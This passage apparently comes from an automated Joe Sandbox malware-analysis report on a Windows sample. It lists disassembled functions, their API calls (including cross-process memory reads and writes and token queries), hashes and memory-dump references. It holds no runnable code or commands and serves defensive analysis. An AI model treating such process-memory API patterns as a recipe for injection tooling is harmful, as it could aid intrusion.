                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,0038A69F,?,?,?), ref: 0038ABF0
                                                                  • HeapAlloc.KERNEL32(00000000,?,0038A69F,?,?,?), ref: 0038ABF7
                                                                  • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0038AC0E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                  • String ID:
                                                                  • API String ID: 842720411-0
                                                                  • Opcode ID: c4371988d8b175f3ab3dfb1f1206e85968d2897e961e8322bdc2a4335054669c
                                                                  • Instruction ID: e3ce6dba93e18cb31285921133ee229434ccc8fd46c6725a4b302de4cb29125d
                                                                  • Opcode Fuzzy Hash: c4371988d8b175f3ab3dfb1f1206e85968d2897e961e8322bdc2a4335054669c
                                                                  • Instruction Fuzzy Hash: 1B01FBB1201204BFEB125FA5EC48D6B7BBDEF89755B11046AF545C2250D671DC40CB61
                                                                  Function 00397A58 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00397A74
                                                                  • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00397A82
                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00397A8A
                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00397A94
                                                                  • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00397AD0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                  • String ID:
                                                                  • API String ID: 2833360925-0
                                                                  • Opcode ID: 974b394db852a772335630c82b55d6d36b8be194b5218e0a7f576913b5977fe1
                                                                  • Instruction ID: 4a8c6d872f489ac885b8dfefda319483f8723bf288d5a7833e3f8b75ce2473ca
                                                                  • Opcode Fuzzy Hash: 974b394db852a772335630c82b55d6d36b8be194b5218e0a7f576913b5977fe1
                                                                  • Instruction Fuzzy Hash: 9F014832C19629EBCF02AFE4EC48AEDBB78FF08711F050456E502B2290DB309A54C7A5
                                                                  Function 00389ABF Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CLSIDFromProgID.OLE32 ref: 00389ADC
                                                                  • ProgIDFromCLSID.OLE32(?,00000000), ref: 00389AF7
                                                                  • lstrcmpiW.KERNEL32(?,00000000), ref: 00389B05
                                                                  • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00389B15
                                                                  • CLSIDFromString.OLE32(?,?), ref: 00389B21
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                  • String ID:
                                                                  • API String ID: 3897988419-0
                                                                  • Opcode ID: ee67253062b99edc850bdcfef6174fd9384f170c6852faecf40954c8dba835ee
                                                                  • Instruction ID: e5c32c15fa811b70579374c89820b60a986c98f3109c4950639f31e19ed2340b
                                                                  • Opcode Fuzzy Hash: ee67253062b99edc850bdcfef6174fd9384f170c6852faecf40954c8dba835ee
                                                                  • Instruction Fuzzy Hash: 86018F76601204BFDB135F64EC44BAA7BEDEB44351F184066F905D6210D770DD04ABA0
                                                                  Function 0038AA62 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0038AA79
                                                                  • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0038AA83
                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0038AA92
                                                                  • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0038AA99
                                                                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0038AAAF
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                  • String ID:
                                                                  • API String ID: 44706859-0
                                                                  • Opcode ID: c5f9c6f3d9735a9c627747054d4510360b739da210ef02e0e94c67bc988011b1
                                                                  • Instruction ID: 8510db0270ca13b6e9483d194969f8027aeb99005dc4c60a5fca0bb12a457ddd
                                                                  • Opcode Fuzzy Hash: c5f9c6f3d9735a9c627747054d4510360b739da210ef02e0e94c67bc988011b1
                                                                  • Instruction Fuzzy Hash: ADF04F752513147FEB126FA4AC89E673BACFF49754F00445AFA41C7190DB649C42CB61
                                                                  Function 0038AAC3 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0038AADA
                                                                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0038AAE4
                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0038AAF3
                                                                  • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0038AAFA
                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0038AB10
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                  • String ID:
                                                                  • API String ID: 44706859-0
                                                                  • Opcode ID: ae58176b7970d5c09bede252135e54bbba1bd2bd836d3488e678855f74361a07
                                                                  • Instruction ID: d2c73cd901cbf40b371d426676369870b0b44dc64427ecca1b2f27aee37d1b40
                                                                  • Opcode Fuzzy Hash: ae58176b7970d5c09bede252135e54bbba1bd2bd836d3488e678855f74361a07
                                                                  • Instruction Fuzzy Hash: 2FF04F752413087FEB131FA4FC88E673B6DFF45754F00406AF942C7190CA609801CB61
                                                                  Function 0038EC80 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,000003E9), ref: 0038EC94
                                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 0038ECAB
                                                                  • MessageBeep.USER32(00000000), ref: 0038ECC3
                                                                  • KillTimer.USER32(?,0000040A), ref: 0038ECDF
                                                                  • EndDialog.USER32(?,00000001), ref: 0038ECF9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                  • String ID:
                                                                  • API String ID: 3741023627-0
                                                                  • Opcode ID: c60932427116a59301197c7eac88fd0dc0770152f4b8567159bed42711e006b4
                                                                  • Instruction ID: aaf5f78c11b938e88ff72db23183b4d97cc6301c071bd085374f400e71de05f1
                                                                  • Opcode Fuzzy Hash: c60932427116a59301197c7eac88fd0dc0770152f4b8567159bed42711e006b4
                                                                  • Instruction Fuzzy Hash: 9801A9309407159BEB266F20EE4EB967B7CFF00B05F00059AF543654E0DBF0AA44CB80
                                                                  Function 0036B0AB Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • EndPath.GDI32(?), ref: 0036B0BA
                                                                  • StrokeAndFillPath.GDI32(?,?,003CE680,00000000,?,?,?), ref: 0036B0D6
                                                                  • SelectObject.GDI32(?,00000000), ref: 0036B0E9
                                                                  • DeleteObject.GDI32 ref: 0036B0FC
                                                                  • StrokePath.GDI32(?), ref: 0036B117
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                  • String ID:
                                                                  • API String ID: 2625713937-0
                                                                  • Opcode ID: f4b40603cd533066e89a82d79bb3c46f6b3da3c08093b795937252166e743e56
                                                                  • Instruction ID: 1d8b96a23e1497f405e2c7b60c5f13548a7405df691c3c25003813772b89a4ea
                                                                  • Opcode Fuzzy Hash: f4b40603cd533066e89a82d79bb3c46f6b3da3c08093b795937252166e743e56
                                                                  • Instruction Fuzzy Hash: 6CF01930102204EFCB229F69FC0C7983F68A701366F08C325F565840F4C73289A5CF14
                                                                  Function 0039F23D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CoInitialize.OLE32(00000000), ref: 0039F2DA
                                                                  • CoCreateInstance.OLE32(003DDA7C,00000000,00000001,003DD8EC,?), ref: 0039F2F2
                                                                  • CoUninitialize.OLE32 ref: 0039F555
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: CreateInitializeInstanceUninitialize
                                                                  • String ID: .lnk
                                                                  • API String ID: 948891078-24824748
                                                                  • Opcode ID: c2740aace282148287509512161923435fe9dfeb06e4d5aae4a1b1fd4a3824f0
                                                                  • Instruction ID: bd6fe629df07a571ae5371b008b99180fbd53e5f4339f914e3b95bed22fbc094
                                                                  • Opcode Fuzzy Hash: c2740aace282148287509512161923435fe9dfeb06e4d5aae4a1b1fd4a3824f0
                                                                  • Instruction Fuzzy Hash: C6A12C71104301AFD702EF64C892EABB7ECEF98719F00491DF5559B1A2DB70EA09CB92
                                                                  Function 0039E7DD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0035660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003553B1,?,?,003561FF,?,00000000,00000001,00000000), ref: 0035662F
                                                                  • CoInitialize.OLE32(00000000), ref: 0039E85D
                                                                  • CoCreateInstance.OLE32(003DDA7C,00000000,00000001,003DD8EC,?), ref: 0039E876
                                                                  • CoUninitialize.OLE32 ref: 0039E893
                                                                    • Part of subcall function 0035936C: __swprintf.LIBCMT ref: 003593AB
                                                                    • Part of subcall function 0035936C: __itow.LIBCMT ref: 003593DF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                  • String ID: .lnk
                                                                  • API String ID: 2126378814-24824748
                                                                  • Opcode ID: 21f85ba42fe555ad319762f4df4c8d46a167765455d9c904b0bdec426efc6f46
                                                                  • Instruction ID: 09efc8b842d2e9d225d678bbcaabdedaaddd3fa01bbb9875126731a09dfc50a0
                                                                  • Opcode Fuzzy Hash: 21f85ba42fe555ad319762f4df4c8d46a167765455d9c904b0bdec426efc6f46
                                                                  • Instruction Fuzzy Hash: E9A155356043019FCB12DF14C884E2EBBE5BF88711F158999F99A9B3A1CB31EC49CB81
                                                                  Function 0037325D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __startOneArgErrorHandling.LIBCMT ref: 003732ED
                                                                    • Part of subcall function 0037E0D0: __87except.LIBCMT ref: 0037E10B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorHandling__87except__start
                                                                  • String ID: pow
                                                                  • API String ID: 2905807303-2276729525
                                                                  • Opcode ID: 47ff94cd2b5199675c99f1bc4b9994b55212bfbd308a4749bd1368e301d6d6e8
                                                                  • Instruction ID: feaf3bb81b57c522f8fca6eb07a533972e61a0f526c607890be95c1a147394c3
                                                                  • Opcode Fuzzy Hash: 47ff94cd2b5199675c99f1bc4b9994b55212bfbd308a4749bd1368e301d6d6e8
                                                                  • Instruction Fuzzy Hash: 38516A71A0820296DB377714C94237A2BDC9B44710F65CDA8F4DDCA1EADF3C8D94B646
                                                                  Function 00394606 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,003EDC50,?,0000000F,0000000C,00000016,003EDC50,?), ref: 00394645
                                                                    • Part of subcall function 0035936C: __swprintf.LIBCMT ref: 003593AB
                                                                    • Part of subcall function 0035936C: __itow.LIBCMT ref: 003593DF
                                                                  • CharUpperBuffW.USER32(?,?,00000000,?), ref: 003946C5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharUpper$__itow__swprintf
                                                                  • String ID: REMOVE$THIS
                                                                  • API String ID: 3797816924-776492005
                                                                  • Opcode ID: 8172f7620e4357c69c4b8edd56d8aea77413e9a750d1aab331f3136521013133
                                                                  • Instruction ID: dca76afa340cd7b3ec3ba9c6d66392f4c83ce5a5354c31fb4c30511b4ce1df2a
                                                                  • Opcode Fuzzy Hash: 8172f7620e4357c69c4b8edd56d8aea77413e9a750d1aab331f3136521013133
                                                                  • Instruction Fuzzy Hash: FA419234A002099FCF06DFA4C881EAEB7B5FF49305F148469E916AF2A2DB34DD46CB50
                                                                  Function 0038C189 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0039430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0038BC08,?,?,00000034,00000800,?,00000034), ref: 00394335
                                                                  • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0038C1D3
                                                                    • Part of subcall function 003942D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0038BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00394300
                                                                    • Part of subcall function 0039422F: GetWindowThreadProcessId.USER32(?,?), ref: 0039425A
                                                                    • Part of subcall function 0039422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0038BBCC,00000034,?,?,00001004,00000000,00000000), ref: 0039426A
                                                                    • Part of subcall function 0039422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0038BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00394280
                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0038C240
                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0038C28D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                  • String ID: @
                                                                  • API String ID: 4150878124-2766056989
                                                                  • Opcode ID: 8c1c0d07f8ef42b0df1b16802f83e395647c8ac298e834a5b7dd8ea58ac737df
                                                                  • Instruction ID: 450c3d78e313777edefbfeb92a8eb14401fe2605da9a2763db8a9659de7498f4
                                                                  • Opcode Fuzzy Hash: 8c1c0d07f8ef42b0df1b16802f83e395647c8ac298e834a5b7dd8ea58ac737df
                                                                  • Instruction Fuzzy Hash: 82411B76900218AEDF12EBA4CD81EEEB778BB09700F004495FA85BB181DA71AE45CB61
                                                                  Function 003BA63F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,003EDC00,00000000,?,?,?,?), ref: 003BA6D8
                                                                  • GetWindowLongW.USER32 ref: 003BA6F5
                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 003BA705
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Long
                                                                  • String ID: SysTreeView32
                                                                  • API String ID: 847901565-1698111956
                                                                  • Opcode ID: 12014be1955e1cd4563088f7a98a556174b2a0c156571b8e155e8e0f4bbcbde0
                                                                  • Instruction ID: 20c5b73f404b85ad35fc7db794990d8e6bdd4f803b9c851e11d4507eae3fa64c
                                                                  • Opcode Fuzzy Hash: 12014be1955e1cd4563088f7a98a556174b2a0c156571b8e155e8e0f4bbcbde0
                                                                  • Instruction Fuzzy Hash: 9131C171205A05AFDB228F78DC41BEA77A9FB49328F254725FA75931E0CB70E8509B50
                                                                  Function 003A5180 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 003A5190
                                                                  • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 003A51C6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: CrackInternet_memset
                                                                  • String ID: |$D:
                                                                  • API String ID: 1413715105-1519587891
                                                                  • Opcode ID: ad74ad4397051b42c44bd7db807ec0047928e50f700cde96f31ffc86d4c0ac36
                                                                  • Instruction ID: d4610fe6df163b6ca458a649f99d6c6a188c8efd4fc5f7e1e54e2c5df47e9b0e
                                                                  • Opcode Fuzzy Hash: ad74ad4397051b42c44bd7db807ec0047928e50f700cde96f31ffc86d4c0ac36
                                                                  • Instruction Fuzzy Hash: 2A311975810219AFCF12AFA4DC85EEE7FB9FF15704F000055E815AA166EB31A946CBA0
                                                                  Function 003BA0D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 003BA15E
                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 003BA172
                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 003BA196
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window
                                                                  • String ID: SysMonthCal32
                                                                  • API String ID: 2326795674-1439706946
